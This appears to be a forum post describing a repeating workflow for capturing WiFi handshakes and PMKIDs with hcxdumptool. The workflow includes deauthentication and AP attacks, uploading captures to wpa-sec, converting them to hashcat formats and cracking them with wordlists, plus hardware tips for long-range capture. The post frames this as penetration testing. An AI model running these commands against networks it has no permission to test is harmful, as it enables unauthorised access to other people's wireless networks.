1) capture traffic:
new area:
hcxdumptool --gpio_button=4 --gpio_statusled=17 -i $WLANDEV -o $ARCHIVNAME.pcapng --poweroff --filterlist=blacklistown --filtermode=1 --give_up_ap_attacks=100000 --give_up_deauthentications=100000
discovered area:
hcxdumptool --gpio_button=4 --gpio_statusled=17 -i $WLANDEV -o $ARCHIVNAME.pcapng --poweroff --filterlist=blacklistown --filtermode=1 --disable_ap_attacks --disable_deauthentications -t 120
2) upload data to wpa-sec:
wlancap2wpasec *.pcapng
3) convert to hasfiles / wordlists or run wlanstrip:
hcxpcaptool -o new.hccapx -k new.16800 -E essidlist -I identitylist -U usernameliste -P pmklist -X clientlist --md5-out=hash.4800 --netntlm=hash.5500 *.*
4) pipe hcxpsktool, hcxwltool output to hashcat and run them against the hashes.
or run hcxallneu (or hcx2500neu or hcx16800neu
5) wait until wpa-sec finished, download cracked.txt and rkg.txt and run them against your hashes
6) loop into 1 to capture new traffic
Attached the scipts and rules to build up a complete environment. You just need to change the path.
Also you need 2 wordlists (names [namen] and month [monate])
scripts&rules.zip (Size: 4.98 KB / Downloads: 24)
Don't wonder about the high value of nonce-error-corrections, but I have to analyze really, really ugly cap files.
On hcxdumdptool pcapng files you can set it to 0, 1 or 2.
Unfortunately I have no strategy to break a single network, because I'm not interested in breaking single networks.
Goal is to find a weak point within the system.
BTW:
A Raspberry Zero WH is the best choise. Low power consumption and small size.
Onboard WiFi soc is really, really ugly in combination with hcxdumptool.
Penetration testing systems 3, 4, 5 are line of sight (LOS) systems with extreme long range capabilites.
Do not run a high power WiFi dongle - a hygain antenna in combination with a low power dongle is much better.